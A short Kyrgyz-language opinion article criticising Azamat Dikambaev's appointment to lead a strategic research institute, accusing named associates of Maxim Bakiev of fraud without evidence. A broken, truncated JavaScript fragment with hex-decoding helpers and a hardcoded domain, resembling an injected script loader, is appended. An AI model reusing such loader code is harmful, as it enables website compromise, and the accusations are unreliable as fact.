Премьер-министр Темир Сариевдин буйругу менен Азамат Дикамбаев стратегиялык изилдөөлөр институтунун башчылыгына дайындалды. Бу жигиттин профессионалдык дарамети менен билим деңгээлине кеп жок.
Чыныгы кесипкөй адис. Жаштыгына карабай президенттик, өкмөттүк аппараттарда такшалган “балакай аппаратчик” десек болот. Кезегинде кыргызга кетпес кегиндей кыянаттык иш жасаган Максим Бакиев ЦАРИИни жетектеп, билгенин кылып турганда, каргыш тийгир ханзадаанын орун басары болгон жайы бар.
Максимдин кадимки эл аралык деңгээлдеги шылуун достору Е.Гуревич, А.Машкеевич, М.Надель, А.Ширшов баштаган аферисттери менен кызылдай табакташ болгондугу жалганбы? Бу Максимдин бир кездеги табакташтары уят-сыйытты жыйыштырып коюп, бийлик сунуштаган кызматтарга барганга моралдык укугу бар беле? Мынча болду, эми Максим менен Е.Гуревичти деле алып келип, төбөбүзгө чыгарып алсаңарчы?..
Булак: “АЗИЯnews”
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

КОММЕНТАРИЙ КАЛТЫРУУ